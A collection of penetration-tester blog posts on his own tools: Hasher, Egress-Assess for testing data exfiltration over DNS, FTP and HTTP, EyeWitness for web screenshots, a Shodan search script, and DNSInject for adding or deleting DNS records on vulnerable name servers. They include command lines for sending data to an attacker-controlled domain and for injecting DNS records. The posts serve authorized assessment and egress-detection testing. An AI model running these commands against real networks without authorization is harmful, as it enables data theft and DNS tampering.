Hasher Re-Write/Update

Github Repo: https://github.com/ChrisTruncer/Hasher

I have made some changes to Hasher, ideally I’d like to think for the better. Hasher was originally a single, large, python script that was used to hash plaintext strings, and compare a hash value to a plaintext string.  Hasher still performs the same actions, generates hashes or compares them with a plaintext string, but Hasher now has been converted into a framework which will allow myself, or anyone else, to easily add in support for different hashes.

Usage is still essentially the same, however there is no longer an interactive menu.  Hasher is now completely command line based.

Hasher Menu

To see a list of all hash-types that Hasher currently supports, simply run ./Hasher.py –list

HashTypes

Once you have the hash-type you want to generate a hash for, it’s fairly simple to generate.  For example, if you were looking to generate (-G) a md5 hash for the string “password123”, you would do it this way:

./Hasher.py -G --plaintext password123 --hash-type md5

You should see output similar to the following:

MD5 Generated

Harmj0y provided me with a great idea when using Hasher.  He had a use case where he just wanted Hasher to dump out all possible hashes for a specific plaintext string, but didn’t want to have to generate all hashes manually.  I added in the ability to generate all possible hash types based on the information provided.  To do this, you would run the following command:

./Hasher.py --plaintext password123 --hash-type all -G

When you run this, you should see output similar to the following:

Hasher All Output

Another capability that Hasher has, is it can take a plaintext string and hash, and then compare (-C) the the plaintext string to ensure it matches the hash.  This has been useful for me when needing to check if a hash and string “equal” each other, without submitting any of the information online.  So, lets continue the previous example.  If you wanted to verify that the plaintext string “password123” matches the md5 hash “482c811da5d5b4bc6d497ffa98491e38”, your command should look like this:

./Hasher.py -C --plaintext password123 --hash 482c811da5d5b4bc6d497ffa98491e38 --hash-type md5

True Comparison

For testing purposes, if the hash and plaintext string didn’t match up, it would look like the following:

False Hasher Comparison

 

Hash Module Development

Adding in support for new hash types is significantly easier now.  Every *.py file within the “hash_ops” folder is automatically picked up and parsed by Hasher.  Within the hash_ops folder, is a text file called “hash_template.txt”.  To add in a new hash-type, simply copy the template file and rename it with a .py extension.  There’s only two required methods within each module:

  • __init__ – This method needs to contained a self.hash_type attribute.  This is what is used by the user from the command line to select a specific hash.  Any other information within the __init__ method is optional.
  • generate – The generate method is called by Hasher to generate a hash.  This method has complete access to all options passed in from the command line by the user.  It must return the hash of the plaintext string.

For a sample, this is what the md5 module looks like:

Hasher MD5 Updated

Hopefully, this helps explain the minor usability changes to Hasher, and elaborates on how it’s now easier to add support for new hashes.  If anyone has any questions, feel free to reach out to me on twitter (@ChrisTruncer) or in #Veil on Freenode!

Exfiltrate Data via DNS with Egress-Assess

Egress-Assess Repo: https://github.com/ChrisTruncer/Egress-Assess

DNS is a channel that can usually be utilized to exfiltrate data out over a network.  Even in the event that a network you are operating in requires authenticating to a proxy for data to leave a network, users can typically make DNS requests which are forwarded on via the local DNS servers in the user’s network.  An attacker can utilize normal DNS functionality to forward data, C2, etc. out of the current network to a destination of their choosing, and Raphael Mudge has already weaponized this for use in Beacon with Cobalt Strike.

A new module has been added in to Egress-Assess that allows you to utilize your system’s DNS server to exfiltrate data.  This is different from the existing DNS module within Egress-Assess.  The existing module send a DNS packet directly to the DNS server you specify, the “dns_resolved” module utilizes your network’s own DNS server.

To utilize the existing network’s DNS server, it will require some setup.  Raphael also has a blog post describing virtually the same configuration/setup that will be required to exfiltrate your data.

The first step I took was to create an A record egress.christophertruncer.com and point that to the server I intend on acting as my endpoint for the data I am exfiltrating.  Next, I created a NS record for a subdomain that I will use for exfiltrating data, and then point the NS record to the A record I just created (egress.christophertruncer.com).  My setup looks like the following:

DNS NS Record

Now, everything is setup and ready to go!  To use this, my sample Egress-Assess command would be:

./Egress-Assess --client dns_resolved --datatype ssn --ip test.christophertruncer.com

Since egress.christophertruncer.com acts as the nameserver for test.christophertruncer.com, all requests using the “test” subdomain are sent to egress, sending all data over DNS to an endpoint I control.

If you have any questions on this, feel free to shoot a tweet my way or hop in #veil on Freenode!

How to Develop Egress-Assess Modules

This post will document how to create server, client, and datatype modules for Egress-Assess.  I’ll document the necessary functions and attributes that the framework requires, and hopefully try to give some helpful info.

Some basic info before diving into the specifics of the differences between the module types.  All __init__ methods are able to access any command line parameter passed in by the user.  If any module requires information from the command line (hint, all of them do in one way or another), you should declare attributes (based off of the command line options) for each class instance within the __init__ method.

All template modules are currently a .txt file.  Once you’ve created your module and want to test/use it, rename it to a .py file within its respective folder.

Server Modules

servermoduletemplate

The first module type to discuss are server modules.  These modules will allow the framework to be put into a “server mode” which typically entails listening and waiting for the client to connect into the server, and transmit data to the server.  A blank server module template is available at this link to use as a base for creating a server module.

The self.protocol attribute is the only required attribute for server modules.  This attribute is what is displayed to the user when typing --list-servers.  This is also the value that is used to identify and use the server module when used in conjunction with the --server flag.

The serve function is the only required function for the server class.  It is what is used by the framework to start the server.  You can create as many different functions as needed for the server class, but the serve function should be considered the “main” of the server module.

Client Modules

clientmoduletemplate

The client module will typically be used to transmit data over a specific protocol, vs. receiving any data.  A blank client module template can be found at this location.

The self.protocol attribute is the only required attribute for client modules.  This attribute is what is displayed to the user when typing --list-clients.  This is also the value that is used to identify and use the server module when used in conjunction with the --client flag.

The transmit function is the only required function for client modules.  It is the function called by the framework  to transmit data.  The transmit function has a variable passed into it (data_to_transmit) which is the data that the client is supposed to transmit to the server.  Similar to server modules, the transmit function should be considered like the “main” function of client modules.  You can create as many additional functions necessary for the client module’s use, but the transmit function is what will be invoked by the framework.

Datatype Modules

datatype template

The datatype module is used to generate any sort of data.  Currently, there’s support for modules that generate social security numbers or credit card numbers.  A blank datatype template can be found at this location.

The self.cli, self.description, and self.filetype attributes are required for datatype modules.  The self.cli attributes is part of what is displayed when the user types --list-datatypes and is what is used to uniquely select the specific datatype to use with the --datatype flag.  This should be short since it is what is passed in by the user in the command line.

The self.description attribute can be used to better describe the datatype that is generated by the module.  This is also displayed when a user types --list-datatypes.  For example, the credit card module has “cc” as the self.cli attribute and “Credit Card Numbers” as the self.description attribute.

The self.filetype is currently only used when attempting to exfil data over ftp, but it is a required attribute.  This is to let the framework know if the data is text or binary data.  If text, keep the filetype attribute as text. Otherwise, change it.

The generate_data function is a required function for datatype modules.  It is what is invoked by the framework to generate the specific type of data requested by the user.  It must also return the total “data” generated.  As an example, the social security number datatype module generates X number of credit cards, and they are returned into the framework at the conclusion of the generate_data function.

Helper Functions

There are a few helper functions that are accessible to all modules.  The functions are in the helpers.py file within the framework.  However, a brief description of this is:

  • helpers.randomNumbers(X) – returns “X” number of random numbers
  • helpers.ea_path() – returns the current path the Egress-Assess is in
  • helpers.writeout_text_data(incoming_data) – writes out a file containing the data passed into function, and returns the name of the file

 

I hope this helps explain how to write any of the currently available modules.  If anyone has any questions, feel free to hit me up on twitter or on IRC in #veil!

Egress-Assess – Testing your Egress Data Detection Capabilities

Github Link: https://github.com/ChrisTruncer/Egress-Assess

On a variety of occasions, our team will attempt to extract data from the network we are operating in and move it to another location for offline analysis.  Ideally, the customer that is being assessed will detect the data being extracted from their network and take preventive measures to stop further data loss.

When looking to copy data off of our target network, an attacker can do so over a variety of channels:

  • Download data through Cobalt Strike’s Beacon (over http or dns)
  • Download data through a Meterpreter Session
  • Manually moving data over FTP, SFTP, etc.

While we routinely inspect and analyze data from the customer environment in order to aid in lateral movement, we also provide customers data exfiltration testing as a service. Performing a data exfiltration exercise can be a valuable service to a customer who wants to validate if their egress detection capabilities can identify potentially sensitive data leaving their network.

I wanted to come up with an easy to use solution that would simulate the extraction of sensitive data from my machine to another.  While trying to plan out a tool, I targeted a few protocols commonly used by attackers:  FTP, HTTP, and HTTPS.  To ensure that I could generate “sensitive” data that would be discovered during defensive operations, I needed to identify what multiple organizations would highly value. Two different sensitive data types that would likely have signatures across organizations are social security numbers and credit card numbers and I decided to target those forms of data in my proof of concept.

After spending a couple days piecing bits of code together, I am happy to release Egress-Assess.

Updated EgressAssess Help Menu

Egress-Assess can act as both the client and the server for the protocol you wish to simulate.  It supports exfiltration testing over HTTP, HTTPS, and FTP.  I envision the tool being used on an internal client and an external server where data would be passed over network boundaries. Once cloned from the repository, the dummy data can be transferred from one machine to another. 

To extract data over FTP, you would first start Egress-Assess’s FTP server by placing it in server mode with the ftp and providing a username and password to use:

./Egress-Assess.py --server ftp --username testuser --password pass123

FTP Server Setup EA

Running that command should start something similar to the following:

FTP Server

This shows that the FTP server is up and running.  With this going, all we need to do now is configure the client to connect to the server!  This is simple, can can be done by telling Egress-Assess to act in client mode and use ftp, provide the username and password to use, the ip to connect to, and the datatype to transmit (in this case, social security numbers).  Your output should look similar to the following…

./Egress-Assess.py --client ftp --username test --password pass --datatype ssn --ip 192.168.63.149

ftpclientupdated

Within the same directory as Egress-Assess, a “data” directory will be created.  Within it is where all transmitted files will be stored.  At this point, the transfer is complete via FTP!

You can also do the same over HTTP or HTTPS.  Again, the first step will be starting one instance to act as the server in http mode.

./Egress-Assess.py --server http

HTTP Server Startup

This will now start a web server to listen on port 80.  The next step is to have your client generate new dummy data, and send it to the web server.  Only this time, we’ll change it up by specifying the approximate amount of data we want to generate.

By default, Egress-Assess will generate approximately 1 megabyte of data (either social security numbers or credit card numbers).  This amount can be changed using the “–data-size” flag.  If we want to send approximately 15 megabytes of credit card data to our web server over http, the command may look as follows…

./Egress-Assess.py --client http --data-size 15 --ip 192.168.63.149 --datatype cc

HTTP Client setup

http data sent

As you can see above, the file was transferred, and our web server received the file!

That about rounds out the current state of Egress-Assess.  Future revisions will include making a more modularized tool so users can easily add support for new protocols, and new data types for transfer.  If there are any other requests, I’d love to hear them!

EyeWitness Now in Ruby!

The best way that I learn languages, is to give myself a task, and force myself to write a script/program that carries out that task.  Well, in this case, I’ve been wanting to change some aspects of EyeWitness, and decided that porting EyeWitness to Ruby would be a great way to make those changes, and learn a new language.  After @harmjoy suggested that I look into learning Ruby, I decided to dive in and get it done.  Now, about two months of working on it, I’m happy to say the EyeWitness Ruby port is ready for its initial release.

To view and download EyeWitness, head to my Github account, or click here!

I will continue to keep the Python version of EyeWitness available, as there are a few differences between the two versions of EyeWitness.  These differences are:

  • Screenshot Library – By adding an additional library for capturing screenshots, the user can switch between the two in the event that one library encounters an issue when capturing select websites.
    • The Python version of EyeWitness uses Ghost to take screenshots of websites.  One of the benefits of this is that it can run headlessly.  However, I have seen an issue when given 3000+ websites, Ghost can freeze.  Also, Robin Wood (@digininja) pointed out that EyeWitness can completely crash while screenshotting websites.  This looks to be due to a potential file descriptor leak within Ghost.  Even though I rarely hit these issues, I still wanted a solution/alternative.  An alternative has been implemented in the Ruby version.
    • The Ruby version uses Selenium for capturing screenshots.  Specifically, Selenium-Webdriver will start up an instance of your web browser (default firefox),  and use the web browser to navigate and screenshot web pages.  For this first release, the ruby version is ONLY supporting Firefox (or a fork like Ice Weasel).  Future releases will support other browsers, such as Chrome.
  • User Agent Switching
    • The Ruby version of EyeWitness does not currently have the ability to dynamically switch user agents for every URL and perform the same comparison checks that the Python version can carry out.  This is because EyeWitness would have to instantiate a new selenium-webdriver object for every user agent, and that takes place in the form of a new web browser opening up.  I believe it would be more of a hassle/distraction to have a large number of web browsers open, so I have not implemented it in the Ruby version.  However, if this is needed, you can still use the user agent switching functionality within the Python version.
  • File Input
    • The Ruby version of Eyewitness requires you to specify the file type you are using as input.  If using Nmap XML output for EyeWitness, you will have to use the –nmap flag, for nessus, the –nessus flag.
  • Skip Sorting
    • The Ruby version has a –skip-sort flag.  This will tell EyeWitness not to group similar pages together, and just write out the report as it goes, vs. writing the report at the end after sorting all pages.

These seem to be the major differences within the two versions for the time being.  I personally believe the Ruby implementation of EyeWitness will be better to use for assessments.  If you encounter any issues, please be sure to report them to me!

Thanks!

EyeWitness Usage Guide

NOTE: This post is now out of date – check this for the latest info – https://www.christophertruncer.com/eyewitness-2-0-release-and-user-guide/

I originally released EyeWitness in February in what I thought was pretty functional state.  When released, EyeWitness came in at about 400 lines of code.  Since February, it has had multiple new features added to it (which I will go over in this post), and its code base has expanded to about 1600 lines of code. I’d like this post to act as a usage guide of all normal usage scenarios that I can think of.

I’ll start off by describing how I normally use EyeWitness.  I typically call EyeWitness, provide it a text file (with each URL on a new line), and let it run.  If I have a .nessus file or nmap.xml output, and it has more than 350 URLs, I’ll run EyeWitness with the –createtargets flag (explained below), and output all the targets to a single text file.  I typically then split that file up into roughly 300 URLs per text file, and then either script up EyeWitness to run one after another, or run scans simultaneously.  However, different situations might cause EyeWitness to need to be used in a different manner, so hopefully this EyeWitness usage guide can help explain all of its features.

Python:

The bare bones, and likely most common, use of EyeWitness is to provide a single URL, or multiple URLs within a file for EyeWitness to screenshot and generate a report.  To provide a single URL, just use the –single flag as follows:
Single URL Scan

EyeWitness also accepts files for providing the URLs.  The file can be provided in the following formats:

  • Single text file with a URL on each line
  • Nmap XML output
  • .Nessus file
  • amap file output
To perform a scan, using any of these filetypes, just provide the -f flag as follows:
File Input Scan

By default, EyeWitness will attempt to screenshot the website, and have a max timeout of 7 seconds.  If it takes longer than 7 seconds to render the website, EyeWitness will skip to the next URL.  If you wish to change the timeout of EyeWitness, use the -t flag and set it to the max number of seconds you want it to wait to render a website. Set Timeout

Once EyeWitness has finished navigating to all URLs, and has generated a report, EyeWitness outputs the report to the same directory EyeWitness is in, and names it based off of the date and time the scan ran.  If you want to change the directory name that EyeWitness outputs its report to, use the -d flag and provide the name.  When using the -d flag, you can provide just a name, and EyeWitness will create the report using the provided name within the same directory as EyeWitness.  You can also provide the full path to a directory, and EyeWitness will create the report folder at that location (just make sure you have the proper write permissions).

Directory name change Full Path report

Sorted reporting was a feature brought up to me by Jason Frank (@jasonjfrank) as something that would be helpful when reviewing the EyeWitness report.  If we had a way to make EyeWitness analyze the different web applications, and group similar web apps together, then it would be easy to quickly sort through/review the groups you want to target.  We envisioned similar printers, mirrored web pages, etc. all grouped together within the report.  Lucky for us, Rohan Vazarkar (@cptjesus) worked on adding this feature in.  His pull request was merged in on April 22nd, and EyeWitness will now attempt to sort all results based off of their title within each report generated.

The –localscan option was added based on a request from David McGuire (@davidpmcguire).  We wanted a way to perform some basic port scanning for web servers once a machine has been compromised. Currently, one way to do it is to drop Nmap on the compromised machine, but if we did that, we’d have to install winpcap on the machine, which requires admin rights.  Instead of this, you can drop the windows Eyewitness binary, and provide the –localscan option with a CIDR range to scan.  EyeWitness will then try to find any ip listening on 80, 443, 8080, and 8443 within the provided range.  All live hosts listening on any of those ports will be added to a file that can be fed back into EyeWitness.

Localscan Portscanning

The –createtargets option came about when I wanted to have EyeWitness just provide me a list of all web servers from the XML output of Nmap or Nessus.  All web servers that EyeWitness finds within Nmap’s xml output, or the nessus file will be added to a file containing the target servers.  Just provide the filename you want the your targets file to be called.

createtargets

The user agent definition and cycling came about from working with Micah Hoffman (@webbreacher), Robin Wood (@digininja), and Chris John Riley (@ChrisJohnRiley).  After a lot of discussion on how best to carry out user agent switching and comparison, the feature was added in.  First, you can simply provide the –useragent option, and it will use any string you provide as the user agent.

Single User Agent

You can also use the –cycle option along with either browser, mobile, crawler, scanner, misc, or all.  When using this option, EyeWitness makes a baseline request.  It will then make subsequent requests with user agents of the “type” you specified.  If the subsequent requests deviate “too much” from the baseline request, the subsequent request will be added in to the report letting you know it was different from the baseline.  The deviation is currently based on the length of the source code the web server provides to EyeWitness.  By default, the deviation that’s used to measure if the requests are different is set to 50.  To change this value, use the –difference flag and provide the new value to use.

Uacycle Cycling Set Difference Value

Finally, the –jitter option was one that was discussed about at a NovaHackers meeting, and also requested by @ruddawg26.  To use this option, provide all the scan parameters you would normally provide, but add on the –jitter parameter at the end, and provide the base number of seconds that it deviates from.  Now, EyeWitness will randomize the order of the URLs provided (via text or XML), and will also have a random delay between each request.

Jitter command Jitter scan

Finally, EyeWitness has a –open flag.  If you provide the –open flag, each URL passed into EyeWitness will also be opened up in a web browser.  Your command string might look similar to the following:

Open option

Ruby:

EyeWitnessRubyHelp

To generate a report for a single website, you need to use the -s or –single flag and provide the URL.

For file based input, you will need to specify the filetype that you are providing.  If giving just a normal text file with each URL on a new line, use the -f or –filename switch.  If using providing Nmap XML output, you’ll need to use the –nmap flag, and .nessus based input requires the –nessus flag.

The –skip-sort flag is used to tell EyeWitness to not auto-group similar web pages together in the report.  This can be helpful if you want to see report pages as they are available, instead of waiting until the very end.  However, if this flag is used, similar pages will not be grouped together.

The –no-dns flag is used when you want EyeWitness to find web servers via their IP address, not their DNS name, while parsing Nmap XML output.

This pretty much covers the features of EyeWitness.  If anyone has any questions, don’t hesitate to get in touch with me.  Also, please be sure to send any signatures you might have made!

ShodanSearch.py for Command Line Searches

By now, everyone should know what Shodan is, and how to use it.  It’s been out for a couple of years, has had multiple presentations on it, and its capabilities have been added to at least a few tools out there (I believe) when used for reconnaissance.  Shodan indexes a large amount of data, which is really helpful when searching for specific devices which happen to be connected to the internet.

In my case, I wanted to start adding signatures of different devices to EyeWitness, but I needed something that could quickly find the devices I wanted to write a signature for.  Quite obviously, Shodan was my answer.  Something else that I wanted to do, was to stage multiple searches for different devices on Shodan.  However, if I were to do this via the web interface, I would either have to perform a search, and then perform the new search, or manage a large number of tabs.  I figured it would be easier to write a quick script that utilizes Shodan’s API (grab an API key here), as it would give me flexibility to script up a large number of search for review later on.  This spawned in a quick script to search Shodan, fittingly called, ShodanSearch.

ShodanSearch

The simplest way to use this script is to call it with the -search option, and provide a string to search for.  This is just like searching for a string on the website.  So you could perform that search by typing something similar to the following:

./ShodanSearch.py -search Apache

And see something similar to this:

String Search

Another feature that can be useful, is to search Shodan by IP.  This will return everything Shodan has indexed about the services available on the provided IP.  There’s three different ways to do this within ShodanSearch, you can either use the -ip, -cidr, or -f options.  The -ip option will perform a Shodan search for a single IP address, the -cidr option will perform a search on Shodan for every ip within the provided CIDR network range, and the -f option will take a file that contains IPs, and search for all results on those IP addresses.  Your searches could look similar to the following:

IP Search

These last few search options have been helpful when my team is on assessments, and we just want to script up a way to see what’s been publicly indexed about our targets.  Most of the time, it’s purely informational documents, but it’s something that has been valuable to our customers, so we provide it to them.

The only thing you’ll need to do to get up and running, is to add your Shodan API key in the script.  After that, you should be good to go!  Hope this helps, feel free to get in touch with me for any questions you may have.

DNS Modification with DNSInject for Nessus Plugin 35372

Part of our normal pen test process, when performing an external assessment, is running a Nessus scan against the in-scope IP range(s) provided by our customer.  We usually have this running in the background while carrying out our own analysis against the IP ranges.  On a past assessment, we started with this same process.  After some time went by, I checked our scan results that we had so far, and found an interesting vulnerability listed.  Specifically, Nessus plugin 35372:

Nessus Plugin Info

Looking at the finding details, Nessus also provided the DNS zone that is vulnerable to modification.  However, one thing that I didn’t see was an existing tool that allowed me to perform the record injection attack (see note below).  I have only seen a finding similar to this on an internal assessment, and in that case I used dnsfun.  However, I wasn’t sure dnsfun would work in this case, and I wanted to learn how to write a script that would perform this attack myself, so I decided to do just that.

I started off by checking out RFC 2136, and learned that I’m going to need to specify the zone that I want to modify (add/remove) a record for and the resource record itself that will be modified, while being sure to set the DNS packet’s opcode to 5 (Update).  This is something that could be easily done with scapy.

Scapy Packet Definition

The great thing about scapy, is you can define any specific packet attribute values that you wish (ttl, record type, etc.), and the attributes that aren’t specified are automatically populated by scapy with their proper values.  The above code states that I want to send a packet to a specific destination, it’s a DNS UDP packet, with the opcode set to 5 (update), and the DNS specific information is set by the command line options provided by the user.  And… that’s it!

I wrapped this up into a script that lets you either add or delete A records on a vulnerable name server pretty easily.  It’s called, simply, DNSInject.

DNSInject Options

To add a record with DNSInject.py, just specify the add action, provide the vulnerable name server, the A record you wish to create, and the IP it will point to.  Your command should look similar to the following:

./DNSInject.py --add -ns 192.168.23.1 -d thisisa.test.local -ip 192.168.23.5

Injection

To delete a record, you only need to provide the vulnerable name server, and the record to delete.  Again, your command could look similar to the following:

./DNSInject.py --delete -ns 192.168.23.1 -d thisisa.test.local

Deletion

To get and use DNSInject, just clone the following github repo – https://github.com/ChrisTruncer/PenTestScripts

Hope this helps, and if you have any questions, feel free to ask!

 

Note: Of course, after completing writing this script, I discovered two other options which can help carry out this attack, so I wanted to be sure to mention them.  Scapy has a built in function to both add and delete records, and you could also use nsupdate. Definitely be sure to check out those options as well!